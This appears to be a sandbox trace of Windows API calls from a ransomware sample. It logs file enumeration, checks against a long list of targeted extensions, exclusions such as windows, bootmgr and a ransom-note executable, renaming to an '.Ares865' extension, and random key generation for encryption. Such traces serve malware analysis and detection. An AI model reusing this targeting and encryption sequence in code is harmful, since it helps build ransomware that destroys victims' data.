(lpString="btr") returned 3 [0086.463] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0086.463] lstrlenW (lpString="cat") returned 3 [0086.463] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0086.463] lstrlenW (lpString="cdb") returned 3 [0086.463] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0086.463] lstrlenW (lpString="ckp") returned 3 [0086.463] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0086.463] lstrlenW (lpString="cma") returned 3 [0086.463] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0086.463] lstrlenW (lpString="cpd") returned 3 [0086.463] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0086.463] lstrlenW (lpString="dacpac") returned 6 [0086.463] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0086.463] lstrlenW (lpString="dad") returned 3 [0086.463] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0086.463] lstrlenW (lpString="dadiagrams") returned 10 [0086.463] lstrcmpiW (lpString1="LL.trx_dll", lpString2="dadiagrams") returned 1 [0086.463] lstrlenW (lpString="daschema") returned 8 [0086.463] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0086.463] lstrlenW (lpString="db-journal") returned 10 [0086.463] lstrcmpiW (lpString1="LL.trx_dll", lpString2="db-journal") returned 1 [0086.463] lstrlenW (lpString="db-shm") returned 6 [0086.463] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0086.463] lstrlenW (lpString="db-wal") returned 6 [0086.463] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0086.463] lstrlenW (lpString="dbc") returned 3 [0086.463] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0086.463] lstrlenW (lpString="dbs") returned 3 [0086.463] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0086.463] lstrlenW (lpString="dbt") returned 3 [0086.463] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0086.463] lstrlenW (lpString="dbv") returned 3 [0086.463] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0086.464] lstrlenW (lpString="dbx") returned 3 [0086.464] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0086.464] lstrlenW (lpString="dcb") returned 3 [0086.464] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0086.464] lstrlenW (lpString="dct") returned 3 [0086.464] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0086.464] lstrlenW (lpString="dcx") returned 3 [0086.464] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0086.464] lstrlenW (lpString="ddl") returned 3 [0086.464] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0086.464] lstrlenW (lpString="dlis") returned 4 [0086.464] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0086.464] lstrlenW (lpString="dp1") returned 3 [0086.464] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0086.464] lstrlenW (lpString="dqy") returned 3 [0086.464] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0086.464] lstrlenW (lpString="dsk") returned 3 [0086.464] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0086.464] lstrlenW (lpString="dsn") returned 3 [0086.464] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0086.464] lstrlenW (lpString="dtsx") returned 4 [0086.464] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0086.464] lstrlenW (lpString="dxl") returned 3 [0086.464] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0086.464] lstrlenW (lpString="eco") returned 3 [0086.464] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0086.464] lstrlenW (lpString="ecx") returned 3 [0086.464] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0086.464] lstrlenW (lpString="edb") returned 3 [0086.464] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0086.464] lstrlenW (lpString="epim") returned 4 [0086.464] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0086.464] lstrlenW (lpString="fcd") returned 3 [0086.464] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0086.464] lstrlenW (lpString="fdb") returned 3 [0086.464] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0086.464] lstrlenW (lpString="fic") returned 3 [0086.465] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0086.465] lstrlenW (lpString="flexolibrary") returned 12 [0086.465] lstrcmpiW (lpString1=".DLL.trx_dll", lpString2="flexolibrary") returned -1 [0086.465] lstrlenW (lpString="fm5") returned 3 [0086.465] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0086.465] lstrlenW (lpString="fmp") returned 3 [0086.465] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0086.465] lstrlenW (lpString="fmp12") returned 5 [0086.465] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0086.465] lstrlenW (lpString="fmpsl") returned 5 [0086.465] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0086.465] lstrlenW (lpString="fol") returned 3 [0086.465] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0086.465] lstrlenW (lpString="fp3") returned 3 [0086.465] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0086.465] lstrlenW (lpString="fp4") returned 3 [0086.465] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0086.465] lstrlenW (lpString="fp5") returned 3 [0086.465] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0086.465] lstrlenW (lpString="fp7") returned 3 [0086.465] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0086.465] lstrlenW (lpString="fpt") returned 3 [0086.465] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0086.465] lstrlenW (lpString="frm") returned 3 [0086.465] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0086.465] lstrlenW (lpString="gdb") returned 3 [0086.465] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.465] lstrlenW (lpString="gdb") returned 3 [0086.465] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.465] lstrlenW (lpString="grdb") returned 4 [0086.465] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0086.465] lstrlenW (lpString="gwi") returned 3 [0086.465] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0086.465] lstrlenW (lpString="hdb") returned 3 [0086.465] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0086.465] lstrlenW (lpString="his") returned 3 [0086.465] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0086.465] lstrlenW (lpString="ib") returned 2 [0086.466] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0086.466] lstrlenW (lpString="idb") returned 3 [0086.466] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0086.466] lstrlenW (lpString="ihx") returned 3 [0086.466] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0086.466] lstrlenW (lpString="itdb") returned 4 [0086.466] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0086.466] lstrlenW (lpString="itw") returned 3 [0086.466] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0086.466] lstrlenW (lpString="jet") returned 3 [0086.466] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0086.466] lstrlenW (lpString="jtx") returned 3 [0086.466] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0086.466] lstrlenW (lpString="kdb") returned 3 [0086.466] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0086.466] lstrlenW (lpString="kexi") returned 4 [0086.466] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0086.466] lstrlenW (lpString="kexic") returned 5 [0086.466] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0086.466] lstrlenW (lpString="kexis") returned 5 [0086.466] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0086.466] lstrlenW (lpString="lgc") returned 3 [0086.466] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0086.466] lstrlenW (lpString="lwx") returned 3 [0086.466] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0086.466] lstrlenW (lpString="maf") returned 3 [0086.466] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0086.466] lstrlenW (lpString="maq") returned 3 [0086.466] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0086.466] lstrlenW (lpString="mar") returned 3 [0086.466] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0086.466] lstrlenW (lpString="marshal") returned 7 [0086.466] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0086.466] lstrlenW (lpString="mas") returned 3 [0086.466] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0086.466] lstrlenW (lpString="mav") returned 3 [0086.467] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0086.467] lstrlenW (lpString="maw") returned 3 [0086.467] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0086.467] lstrlenW (lpString="mdbhtml") returned 7 [0086.467] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0086.467] lstrlenW (lpString="mdn") returned 3 [0086.467] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0086.467] lstrlenW (lpString="mdt") returned 3 [0086.467] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0086.467] lstrlenW (lpString="mfd") returned 3 [0086.467] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0086.467] lstrlenW (lpString="mpd") returned 3 [0086.467] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0086.467] lstrlenW (lpString="mrg") returned 3 [0086.467] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0086.467] lstrlenW (lpString="mud") returned 3 [0086.467] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0086.467] lstrlenW (lpString="mwb") returned 3 [0086.467] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0086.467] lstrlenW (lpString="myd") returned 3 [0086.467] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0086.467] lstrlenW (lpString="ndf") returned 3 [0086.467] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0086.467] lstrlenW (lpString="nnt") returned 3 [0086.467] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0086.467] lstrlenW (lpString="nrmlib") returned 6 [0086.467] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0086.467] lstrlenW (lpString="ns2") returned 3 [0086.467] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0086.467] lstrlenW (lpString="ns3") returned 3 [0086.467] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0086.467] lstrlenW (lpString="ns4") returned 3 [0086.467] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0086.467] lstrlenW (lpString="nsf") returned 3 [0086.467] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0086.467] lstrlenW (lpString="nv") returned 2 [0086.467] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0086.468] lstrlenW (lpString="nv2") returned 3 [0086.468] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0086.468] lstrlenW (lpString="nwdb") returned 4 [0086.468] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0086.468] lstrlenW (lpString="nyf") returned 3 [0086.468] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0086.468] lstrlenW (lpString="odb") returned 3 [0086.468] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.468] lstrlenW (lpString="odb") returned 3 [0086.468] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.468] lstrlenW (lpString="oqy") returned 3 [0086.468] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0086.468] lstrlenW (lpString="ora") returned 3 [0086.468] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0086.468] lstrlenW (lpString="orx") returned 3 [0086.468] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0086.468] lstrlenW (lpString="owc") returned 3 [0086.468] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0086.468] lstrlenW (lpString="p96") returned 3 [0086.468] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0086.468] lstrlenW (lpString="p97") returned 3 [0086.468] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0086.468] lstrlenW (lpString="pan") returned 3 [0086.468] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0086.468] lstrlenW (lpString="pdb") returned 3 [0086.468] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0086.468] lstrlenW (lpString="pdm") returned 3 [0086.468] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0086.468] lstrlenW (lpString="pnz") returned 3 [0086.468] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0086.468] lstrlenW (lpString="qry") returned 3 [0086.468] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0086.468] lstrlenW (lpString="qvd") returned 3 [0086.468] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0086.468] lstrlenW (lpString="rbf") returned 3 [0086.468] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0086.468] lstrlenW (lpString="rctd") returned 4 [0086.468] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0086.469] lstrlenW (lpString="rod") returned 3 [0086.469] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0086.469] lstrlenW (lpString="rodx") returned 4 [0086.469] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0086.469] lstrlenW (lpString="rpd") returned 3 [0086.469] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0086.469] lstrlenW (lpString="rsd") returned 3 [0086.469] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0086.469] lstrlenW (lpString="sas7bdat") returned 8 [0086.469] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0086.469] lstrlenW (lpString="sbf") returned 3 [0086.469] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0086.469] lstrlenW (lpString="scx") returned 3 [0086.469] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0086.469] lstrlenW (lpString="sdb") returned 3 [0086.469] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0086.469] lstrlenW (lpString="sdc") returned 3 [0086.469] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0086.469] lstrlenW (lpString="sdf") returned 3 [0086.469] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0086.469] lstrlenW (lpString="sis") returned 3 [0086.469] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0086.469] lstrlenW (lpString="spq") returned 3 [0086.469] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0086.469] lstrlenW (lpString="te") returned 2 [0086.469] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0086.469] lstrlenW (lpString="teacher") returned 7 [0086.469] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0086.469] lstrlenW (lpString="tmd") returned 3 [0086.469] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0086.469] lstrlenW (lpString="tps") returned 3 [0086.469] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0086.469] lstrlenW (lpString="trc") returned 3 [0086.469] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.469] lstrlenW (lpString="trc") returned 3 [0086.469] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.469] lstrlenW (lpString="trm") returned 3 [0086.469] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0086.470] lstrlenW (lpString="udb") returned 3 [0086.470] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0086.470] lstrlenW (lpString="udl") returned 3 [0086.470] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0086.470] lstrlenW (lpString="usr") returned 3 [0086.470] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0086.470] lstrlenW (lpString="v12") returned 3 [0086.470] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0086.470] lstrlenW (lpString="vis") returned 3 [0086.470] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0086.470] lstrlenW (lpString="vpd") returned 3 [0086.470] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0086.470] lstrlenW (lpString="vvv") returned 3 [0086.470] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0086.470] lstrlenW (lpString="wdb") returned 3 [0086.470] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0086.470] lstrlenW (lpString="wmdb") returned 4 [0086.470] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0086.470] lstrlenW (lpString="wrk") returned 3 [0086.470] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0086.470] lstrlenW (lpString="xdb") returned 3 [0086.470] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0086.470] lstrlenW (lpString="xld") returned 3 [0086.470] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0086.470] lstrlenW (lpString="xmlff") returned 5 [0086.470] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0086.470] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll.Ares865") returned 79 [0086.470] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\outlwvw.dll.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\outlwvw.dll.trx_dll.ares865"), dwFlags=0x1) returned 1 [0086.471] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\outlwvw.dll.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0086.471] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11616) returned 1 [0086.471] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0086.472] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0086.472] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0086.472] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0086.473] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0086.473] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.473] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3060, lpName=0x0) returned 0x15c [0086.474] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3060) returned 0x190000 [0086.475] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0086.476] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0086.476] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.476] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0086.476] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0086.476] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0086.476] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0086.476] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0086.476] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0086.476] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0086.477] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0086.477] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0086.477] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0086.477] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0086.477] CloseHandle (hObject=0x15c) returned 1 [0086.477] CloseHandle (hObject=0x118) returned 1 [0086.477] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0086.477] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0086.477] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0086.477] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1a4a9400, ftCreationTime.dwHighDateTime=0x1cac804, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1a4a9400, ftLastWriteTime.dwHighDateTime=0x1cac804, nFileSizeHigh=0x0, nFileSizeLow=0xd160, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PPINTL.DLL.trx_dll", cAlternateFileName="PPINTL~1.TRX")) returned 1 [0086.477] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0086.477] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="aoldtz.exe") returned 1 [0086.477] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2=".") returned 1 [0086.477] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="..") returned 1 [0086.477] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="windows") returned -1 [0086.477] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="bootmgr") returned 1 [0086.477] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="temp") returned -1 [0086.478] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="pagefile.sys") returned 1 [0086.478] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="boot") returned 1 [0086.478] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="ids.txt") returned 1 [0086.478] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0086.478] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="perflogs") returned 1 [0086.478] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="MSBuild") returned 1 [0086.478] lstrlenW (lpString="PPINTL.DLL.trx_dll") returned 18 [0086.478] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll") returned 71 [0086.478] lstrcpyW (in: lpString1=0x2cce468, lpString2="PPINTL.DLL.trx_dll" | out: lpString1="PPINTL.DLL.trx_dll") returned="PPINTL.DLL.trx_dll" [0086.478] lstrlenW (lpString="PPINTL.DLL.trx_dll") returned 18 [0086.478] lstrlenW (lpString="Ares865") returned 7 [0086.478] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0086.478] lstrlenW (lpString=".dll") returned 4 [0086.478] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2=".dll") returned 1 [0086.478] lstrlenW (lpString=".lnk") returned 4 [0086.478] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2=".lnk") returned 1 [0086.478] lstrlenW (lpString=".ini") returned 4 [0086.478] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2=".ini") returned 1 [0086.478] lstrlenW (lpString=".sys") returned 4 [0086.478] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2=".sys") returned 1 [0086.478] lstrlenW (lpString="PPINTL.DLL.trx_dll") returned 18 [0086.478] lstrlenW (lpString="bak") returned 3 [0086.478] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0086.478] lstrlenW (lpString="ba_") returned 3 [0086.478] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0086.478] lstrlenW (lpString="dbb") returned 3 [0086.478] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0086.478] lstrlenW (lpString="vmdk") returned 4 [0086.478] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0086.478] lstrlenW (lpString="rar") returned 3 [0086.478] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0086.478] lstrlenW (lpString="zip") returned 3 [0086.478] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0086.478] lstrlenW (lpString="tgz") returned 3 [0086.478] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0086.478] lstrlenW (lpString="vbox") returned 4 [0086.479] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0086.479] lstrlenW (lpString="vdi") returned 3 [0086.479] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0086.479] lstrlenW (lpString="vhd") returned 3 [0086.479] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0086.479] lstrlenW (lpString="vhdx") returned 4 [0086.479] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0086.479] lstrlenW (lpString="avhd") returned 4 [0086.479] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0086.479] lstrlenW (lpString="db") returned 2 [0086.479] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0086.479] lstrlenW (lpString="db2") returned 3 [0086.479] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0086.479] lstrlenW (lpString="db3") returned 3 [0086.479] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0086.479] lstrlenW (lpString="dbf") returned 3 [0086.479] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0086.479] lstrlenW (lpString="mdf") returned 3 [0086.479] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0086.479] lstrlenW (lpString="mdb") returned 3 [0086.479] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0086.479] lstrlenW (lpString="sql") returned 3 [0086.479] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0086.479] lstrlenW (lpString="sqlite") returned 6 [0086.479] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0086.479] lstrlenW (lpString="sqlite3") returned 7 [0086.479] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0086.479] lstrlenW (lpString="sqlitedb") returned 8 [0086.479] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0086.479] lstrlenW (lpString="xml") returned 3 [0086.479] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0086.479] lstrlenW (lpString="$er") returned 3 [0086.479] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0086.479] lstrlenW (lpString="4dd") returned 3 [0086.479] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0086.479] lstrlenW (lpString="4dl") returned 3 [0086.479] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0086.479] lstrlenW (lpString="^^^") returned 3 [0086.480] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0086.480] lstrlenW (lpString="abs") returned 3 [0086.480] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0086.480] lstrlenW (lpString="abx") returned 3 [0086.480] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0086.480] lstrlenW (lpString="accdb") returned 5 [0086.480] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0086.480] lstrlenW (lpString="accdc") returned 5 [0086.480] lstrcmpiW (lpString1="x_dll", lpString2="accdc") 